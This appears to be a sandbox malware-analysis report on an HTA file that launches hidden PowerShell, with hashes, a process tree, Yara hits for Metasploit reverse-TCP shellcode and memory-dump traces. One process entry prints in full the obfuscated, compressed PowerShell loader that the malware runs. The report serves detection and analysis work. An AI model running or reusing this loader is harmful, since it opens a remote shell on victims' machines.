                SSDEEP:3:NlllulPki/llllZ:NllUcylll
                MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e.................................^..............@..........
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                File type:HTML document, ASCII text, with very long lines (7091)
                Entropy (8bit):4.622763878457413
                TrID:
                  File name:na.hta
                  File size:7'458 bytes
                  MD5:80d63e57cf21fda8b8c90e474eb46a4a
                  SHA1:ca838f1b1972ceefbeda106c0f201a87d3d8a5c9
                  SHA256:23d30acfa7336b1bcd1a62a2225f1ad2c2f82f683cf70041874bb9ecfad9dfec
                  SHA512:0d4d22b487abccc240a88d88246467fac195ff212ce8dd73a00d93de78bf96e49857e6ae59cc4d546197086ad5aae0500f6fa624399cb4b8884824a9bdd8b068
                  SSDEEP:192:Jn2jh1hqT2jzl46T6erUllgkQaoXIUF6hd9d:Jn2jh1hskrT6erUlikQa3hd9d
                  TLSH:99F1F167CA30BCD847AD3280A7A11C5E21E9555783778A70C7091CF63E96782FF6A6CC
                  File Content Preview:<script language="VBScript">. window.moveTo -4000, -4000. Set oYF_mILKkDd = CreateObject("Wscript.Shell"). Set aFEZ = CreateObject("Scripting.FileSystemObject"). For each path in Split(oYF_mILKkDd.ExpandEnvironmentStrings("%PSModulePath%"),";"). If

                  Target ID:0
                  Start time:02:10:09
                  Start date:16/10/2024
                  Path:C:\Windows\SysWOW64\mshta.exe
                  Wow64 process (32bit):true
                  Commandline:mshta.exe "C:\Users\user\Desktop\na.hta"
                  Imagebase:0x3c0000
                  File size:13'312 bytes
                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:1
                  Start time:02:10:09
                  Start date:16/10/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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
                  Imagebase:0x840000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:02:10:09
                  Start date:16/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:02:10:10
                  Start date:16/10/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDw
YBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
                  Imagebase:0x840000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2284451182.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:02:10:10
                  Start date:16/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bee14ccec71757d9404bb0a781263fb9902f42ea31986357312d5d2ec25a070b
                    • Instruction ID: cf56a8b7fd522e9a43a056a126b880d12a82d3452ac5c8a5c16dc92b5bbb806c
                    • Opcode Fuzzy Hash: bee14ccec71757d9404bb0a781263fb9902f42ea31986357312d5d2ec25a070b
                    • Instruction Fuzzy Hash: CF123A74A00249DFCB15CF98C494AADFBB2BF88314F25C56AE814AB3A5C735ED41CB90
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f5869cbd577a4ac479b16e69b6e869fe5c67dfd1c418b0362a12e6dbf211231
                    • Instruction ID: 5512a894f3041a5d8f5dfba0d8ad7c29ee459c170e2c89e8f1e166e45dc0d3cf
                    • Opcode Fuzzy Hash: 0f5869cbd577a4ac479b16e69b6e869fe5c67dfd1c418b0362a12e6dbf211231
                    • Instruction Fuzzy Hash: 0FF16D34A052589FCB16CFA8D890ADDBFB5EF89310F15C19AE844AB392C731ED45CB91
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 788aa9b1aa5a84c28d4abc7439308213d9a01d06ba1a1fb4868e0bbdf9067c8f
                    • Instruction ID: da8f9283b2535fa603ec0b59bec00b540e45f9daac20efae81bd13e953854c25
                    • Opcode Fuzzy Hash: 788aa9b1aa5a84c28d4abc7439308213d9a01d06ba1a1fb4868e0bbdf9067c8f
                    • Instruction Fuzzy Hash: CA415974A00505DFCB1ACF59C5989AEFBB1FF48310B258669D905AB3A4C332FC51CBA0
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8fc5b981f69d9b883496d3b355f88139f7df4c8800f26ea83835f59ff560bd8
                    • Instruction ID: 6eefa44536ca83e4816845ca59678ef319233cd50f9bba1681ded8a066158fb1
                    • Opcode Fuzzy Hash: b8fc5b981f69d9b883496d3b355f88139f7df4c8800f26ea83835f59ff560bd8
                    • Instruction Fuzzy Hash: B2413674A00509DFCB19CF49C598AAEFBB5FF48310B218669D905AB3A4C732FC51CBA0
                    Memory Dump Source
                    • Source File: 00000001.00000002.2188672443.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7480000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6f009a83f9fcb062a70d54891c057585963b90126ca58708f276f69a2ed42677
                    • Instruction ID: ceabae23283b2fad7d33fc0b27097044169b3bed38a41e9e754bda3f9a738af5
                    • Opcode Fuzzy Hash: 6f009a83f9fcb062a70d54891c057585963b90126ca58708f276f69a2ed42677
                    • Instruction Fuzzy Hash: 0C2149B2B0020E8BDB55B669D8102FFB755ABC5610F14856FC5538B292EF31C90387A2
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db785484eb76fc9514cf5dbb4b68c0c486876d3fd38b2932751507ef4118f5ab
                    • Instruction ID: 1aafd84a9473af74b399e85d3d35f3fde88ff04ff7b4a6ac59acc524483f2262
                    • Opcode Fuzzy Hash: db785484eb76fc9514cf5dbb4b68c0c486876d3fd38b2932751507ef4118f5ab
                    • Instruction Fuzzy Hash: 3B215E74A00219DFCB11CF98D8809AEFBB5FF89310B1081A5E905AB352C731FD41CBA1
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180228220.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_2cbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 993b25bb6978eede58ecb4184af862cf952d53da893761bd4a3ba7c23d484b80
                    • Instruction ID: 838e22c05a4f9363bef2e7912dc26b2a1d032ca97c91253244f243a3b0bc0c05
                    • Opcode Fuzzy Hash: 993b25bb6978eede58ecb4184af862cf952d53da893761bd4a3ba7c23d484b80
                    • Instruction Fuzzy Hash: 54015E6240E3C09FE7138B259894B92BFB4DF43225F1DC0DBD9888F1A3C2695849C7B2
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180228220.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_2cbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6cebb535219ca1e2546e7e32e27d60f5b15cb771f366a8c531c5406ca0ad01ef
                    • Instruction ID: fbe715bd90436067bbda7e2b7a26cf64746f2a39e29a12e80a878bcef255a042
                    • Opcode Fuzzy Hash: 6cebb535219ca1e2546e7e32e27d60f5b15cb771f366a8c531c5406ca0ad01ef
                    • Instruction Fuzzy Hash: 95012671405344DAE7114E26EDC0BA7BF98DF81375F08C41AEE0A0B242CBB99941CAF1
                    Memory Dump Source
                    • Source File: 00000001.00000002.2188672443.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7480000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6286bcc9ce31581a3baa99a2a5abec4bace290078f6daa7e1923d0b9288177c
                    • Instruction ID: c6d04e7b7d03c8a13cd2fff3099a0be72d6ed8cf8935f8a57e8a86ccb12890a5
                    • Opcode Fuzzy Hash: e6286bcc9ce31581a3baa99a2a5abec4bace290078f6daa7e1923d0b9288177c
                    • Instruction Fuzzy Hash: 8BF059B570020DDBDD54B79894206EE7B19FBC9F01F10125BEA026F680CF624D034BAB
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 840abd57d06402436084c0fb2e7746137ac7b630aced7ea52089b43598610985
                    • Instruction ID: 1987e81fc85de9bca09517e77fa8d6c9fdca63f1eefb05a5565bbffe3101636f
                    • Opcode Fuzzy Hash: 840abd57d06402436084c0fb2e7746137ac7b630aced7ea52089b43598610985
                    • Instruction Fuzzy Hash: 0BF05E34A00145AFCB04CBA8D8449AAFBB5FFC8310B348199D959A3651CB32AC93CB90
                    APIs
                    • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,77070002,1F4A6856,0000000A,?,?,5F327377,00003233), ref: 07E000D5
                    Memory Dump Source
                    • Source File: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                    Yara matches
                    Similarity
                    • API ID: Socket
                    • String ID:
                    • API String ID: 38366605-0
                    • Opcode ID: 12a7b52c5c6eafa18c9b444ca4886760d177891260f607b5ce74b0f9a8d95320
                    • Instruction ID: b54a0288a3258e5c42ddff52ffab6771936ab38483438c5557b2d5f70c02b3ed
                    • Opcode Fuzzy Hash: 12a7b52c5c6eafa18c9b444ca4886760d177891260f607b5ce74b0f9a8d95320
                    • Instruction Fuzzy Hash: 8F11C0F07822997EF53022629C07FBB391CDF42BA8F000425BB45FA0C0D9929CC081FA
                    APIs
                    • CreateThread.KERNELBASE(?,00000000,?,?,?,?), ref: 02C6C479
                    Memory Dump Source
                    • Source File: 00000003.00000002.2283950587.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_2c60000_powershell.jbxd
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: eaa3c60a97d4d181a92d2b41bcf2791ad21ebad35067f3e5a176c21993598da6
                    • Instruction ID: 5bd7057b637b2750400abf98f6ad81b787f220f6248db03a851c5f001aebfd66
                    • Opcode Fuzzy Hash: eaa3c60a97d4d181a92d2b41bcf2791ad21ebad35067f3e5a176c21993598da6
                    • Instruction Fuzzy Hash: 621147729002099FDB10CFAAD845BEFBBF5AF88320F14841AE559A7210CB759550CFA1
                    APIs
                    • CreateThread.KERNELBASE(?,00000000,?,?,?,?), ref: 02C6C479
                    Memory Dump Source
                    • Source File: 00000003.00000002.2283950587.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_2c60000_powershell.jbxd
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: c22a4505f81d9099681ae7894d65e7e3b9a6844b3dff9b75a9182dcb070ed2fa
                    • Instruction ID: a74c33d136f33bebc029d05b51bc860b2473c3732e69af0434ec3f6c9fadb5f8
                    • Opcode Fuzzy Hash: c22a4505f81d9099681ae7894d65e7e3b9a6844b3dff9b75a9182dcb070ed2fa
                    • Instruction Fuzzy Hash: 881126729002499FDF10DFAAC845BEFBBF5EF88720F14841AE559A7210CB75A550CFA1
                    Memory Dump Source
                    • Source File: 00000003.00000002.2297706580.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 160ddd54f45fa68810af4aad3a6e15195ce020867b60ff62b86469c28749a2ca
                    • Instruction ID: d97dfaa554896ec183bb1e8d05a65ebf7474bdf976f6f544d5dda2d54de803d4
                    • Opcode Fuzzy Hash: 160ddd54f45fa68810af4aad3a6e15195ce020867b60ff62b86469c28749a2ca
                    • Instruction Fuzzy Hash: 06B1B175A20256DFCB248F69C840AAEBBE2FFD9310F298499E9059B341DF71DC11CB91
                    Memory Dump Source
                    • Source File: 00000003.00000002.2282761077.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_29cd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a03e8b4aa7ddb1e1d08babc656006cf101dd5e5a0102b34a00f2610cb2b230c
                    • Instruction ID: 8d288504c42008a7b9d4e2a8963f9c4aa278ed390b505edb24ac6865f9e6cd83
                    • Opcode Fuzzy Hash: 7a03e8b4aa7ddb1e1d08babc656006cf101dd5e5a0102b34a00f2610cb2b230c
                    • Instruction Fuzzy Hash: 6401A2724053449AE7108A29DD84B67BF9CDF81774F28C42EED485A242C7B99942C6B2
                    Memory Dump Source
                    • Source File: 00000003.00000002.2282761077.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_29cd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f53aadd66b7d74294e17b4b6e8a5668f8daea22165f1742b783fd68ff11299d3
                    • Instruction ID: a501c3c00176bd71b7113e54057528eaf01dabf98ee04d6dc1576994d3397508
                    • Opcode Fuzzy Hash: f53aadd66b7d74294e17b4b6e8a5668f8daea22165f1742b783fd68ff11299d3
                    • Instruction Fuzzy Hash: 0201006140E3C05FD7138B259D94752BFB8DF43624F19C1DBD9888F5A3C2695845C772